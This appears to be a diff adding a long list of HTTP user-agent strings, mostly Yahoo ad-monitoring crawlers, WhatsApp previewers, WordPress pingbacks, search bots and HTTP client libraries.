    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606794167-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606803897-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606803914-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606828355-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606828358-0
    +WhatsApp/2.20.130.22 i
    +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) anywhere.app/8.1.4 Chrome/80.0.3987.165 Electron/8.5.0 Safari/537.36 Tc-webkit AppEngine-Google; (+http://code.google.com/appengine; appid: s~live-fullspectrum)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606865620-0
    +FDM/6.12.0.3350
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1606786496-60
    +WordPress/5.5.3; https://imagensfavorito.buzz
    +WhatsApp/2.20.206.3 A
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 PTST/201201.211227
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1606869515-0
    +WordPress.com; https://salvetore.wordpress.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606909778-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606949577-0
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 PTST/201202.231242
    +WordPress/5.1.8; http://showmenweek.ru
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606946806-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606946814-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606946818-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606948167-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606930392-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1606871038-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606890996-0
    +WhatsApp/2.20.207.7 A
    +WhatsApp/2.2047.12 N
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606930380-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606930382-0
    +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) anywhere.app/1.8.701 Chrome/80.0.3987.165 Electron/8.5.0 Safari/537.36 Tc-webkit AppEngine-Google; (+http://code.google.com/appengine; appid: s~live-fullspectrum)
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Mobile Safari/537.36 PTST/201202.201200
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 PTST/201202.211248
    +WordPress/5.5.3; http://gamingweb.xyz
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.0.946 (SpeedMode; Proxy; Android 4.4.2; GT-I9192 ) U2/1.0.0 Mobile
    +Mozilla/5.0 SeznamEmailProxy/0.0.42
    +TurnitinBot/1.5 http://www.turnitin.com/robot/crawlerinfo.html
    +http://Anonymouse.org/
    +WhatsApp/2.20.207.8 A
    +WordPress.com; https://cybersecfaith.com
    +WordPress.com; http://cybersecfaith.com
    +WordPress/5.5.3; https://cryptomerous.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606991544-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606994718-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1606959001-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606991532-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606994707-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607009743-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607009755-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607024876-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607024878-0
    +WordPress/5.5.3; https://latecnologiaatualcance.com
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 PTST/201130.161108
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 PTST/201202.231242
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Mobile Safari/537.36 PTST/201202.231242
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 PTST/201202.231242
    +WhatsApp/2.20.201.22 A
    +WhatsApp/2.20.190 A
    +WordPress/5.5.3; http://sonuseo.xyz
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) mrs_image/1607014925-60
    +WordPress/5.5.3; https://frazeologi.ru EWWW/582.0
    +GuzzleHttp/6.5.5 curl/7.52.1 PHP/7.3.11-1+0~20191026.48+debian9~1.gbpf71ca0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606959241-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1606959243-0
    +AvsDeviceSdk/1.19.1
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 PTST/201204.141249
    +CaptiveNetworkSupport-407.40.1 wispr
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1607041734-0
    +WordPress/5.5.3; http://3.16.239.73
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.6.805 (SpeedMode; Proxy; Android 6.0.1; SM-J710GN ) U2/1.0.0 Mobile
    +WordPress/5.5.3; https://boroda.io
    +WordPress/5.5.3; http://35.199.34.74
    +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    +WordPress/5.5.3; https://help.britecore.com
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607090752-10
    +Apache-HttpClient/4.5.3 (Java/1.8.0_272)
    +WhatsApp/2.20.207.9 A
    +WhatsApp/2.2047.13 N
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Edg/85.0.564.70
    +WhatsApp/2.20.206.21 A
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
    +WordPress/5.5.3; https://casperlibero.edu.br
    +Mozilla/5.0 (Linux; Android 5.0.2; SM-G920T Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Mobile Safari/537.36 DareBoost
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 PTST/201204.141249
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.2.962 (SpeedMode; Proxy; Android 5.1; 1201 ) U2/1.0.0 Mobile
    +WordPress/5.5.3; https://frazeologi.ru
    +WordPress/5.3.4; https://pc-windows.ru
    +facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)+Mozilla/5.0 (Android 6.0.1; Xiaomi Redmi 4A) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.1.4.573 (SpeedMode; Proxy; Android 9; Redmi_8 ) U2/1.0.0 Mobile
    +Snapchat/10.84.5.0 (SM-G988B; Android 10#G988BXXS2ATE7#29; gzip) V/MUSHROOM
    +WordPress.com; https://andresblancop2.wordpress.com
    +WhatsApp/2.20.206.24 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607174728-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1607133274-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607174716-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607174721-0
    +WhatsApp/2.20.131.3 i
    +WhatsApp/2.20.207.10 A
    +WordPress/5.5.3; https://seekalgo.net
    +The Incutio XML-RPC PHP Library -- WordPress/5.5.3
    +Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 AppEngine-Google; (+http://code.google.com/appengine; appid: s~surf702-hrd)
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607250547-0
    +GuzzleHttp/6.5.5 curl/7.68.0 PHP/7.4.3
    +PHP/6.2.95
    +WordPress/5.4.4; http://tvacaradabahia.com.br
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607308641-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607321379-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607321367-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607321370-0
    +Screaming Frog SEO Spider/14.1
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 PTST/201207.191227
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) mrs_image/1607310644-60
    +WordPress/5.5.3; http://dalmuseum.ru
    +WordPress/4.9.16; http://www.uelfxq.co
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607386949-0
    +WordPress/5.4.4; https://www.tech-girlz.com
    +Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607386950-10
    +GuzzleHttp/6.5.5 curl/7.47.0 PHP/7.4.13
    +GuzzleHttp/6.5.5 curl/7.47.0 PHP/7.1.33-2+ubuntu16.04.1+deb.sury.org+1
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607465967-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607393492-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1607388972-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607393481-0
    +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1607404076-0
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 PTST/201208.021248
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607421484-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607421826-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607421835-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607427338-0
    +WhatsApp/2.20.193.8 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1607442455-0
    +WhatsApp/2.20.207.11 A
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 PTST/201207.191227
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 PTST/201208.021248
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 PTST/201208.211219
    +Mozilla/5.0 SeznamEmailProxy/0.0.44
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.1.2.571 (SpeedMode; Proxy; Android 6.0; VFD_1100 ) U2/1.0.0 Mobile
    +WordPress/5.5.3; https://ranklaptop.com
    +Apache-HttpClient/4.5.10 (Java/11.0.9.1)
    +WordPress/5.4.4; http://gzapxt.com
    +WordPress/5.5.3; http://www.iuepr.edu.mx
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 PTST/201209.031210
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607543270-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1607478251-0
    +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/87.0.4280.90 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607492069-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607492073-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1607521209-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1607527764-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1607532421-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1607541986-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1607545415-0
    +WhatsApp/2.2049.6 N
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 PTST/201209.001235
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 PTST/201209.031210
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 PTST/201209.141228
    +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/87.0.4280.90 Mobile Safari/537.36
    +WordPress/5.5.3; https://partition-magic-ru.ru
    +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) mrs_image/1607473906-10
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.6.805 (SpeedMode; Proxy; Android 10; TECNO_KD7h ) U2/1.0.0 Mobile
    +WordPress/5.6; https://ranklaptop.com
    +WhatsApp/2.2049.8 N
    +WhatsApp/2.20.207.15 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607564114-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607571427-10
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    +WhatsApp/2.17.40 i
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607591841-0
    +WhatsApp/2.20.207.12 A
    +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 PTST/201209.141228
    +ArchiveTeam ArchiveBot/20201201.72d2d09 (wpull 2.0.3) and not Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607618743-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607618744-0
    +Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/9643
    +curl/7.69.1 Dalvik/2.1.0
    +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 5.1; 5025D ) U2/1.0.0 Mobile
    +WordPress/5.4; http://159.69.72.230
    +WordPress/5.4.4; http://localhost/login
    +WhatsApp/2.2049.7 N
    +WordPress/5.6; https://wpbuffs.com
    +WhatsApp/2.20.198.13 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607645974-10
    +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607707261-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607658779-0
    +WhatsApp/2.20.206.19 A
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607675069-0
    +Java/11.0.8
    +WordPress/5.6; https://fintaxi.ru
    +python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.6.1.el7.x86_64
    +Java/1.7.0_95
    +WordPress/5.6; https://wawplus.com
    +WhatsApp/2.2049.9 N
    +Mozilla/5.0 (compatible; YandexAccessibilityBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.268
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607816882-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607816915-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607816910-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607734778-10
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1607733577-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607734768-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607734766-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1607738940-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607764118-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607764116-0
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607766374-0
    +WordPress/4.9.15; http://www.fasdxk.co
    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 PTST/201213.201206
    +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html)  tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1607835817-10
    +WordPress/5.5.3; https://azurplus.fr
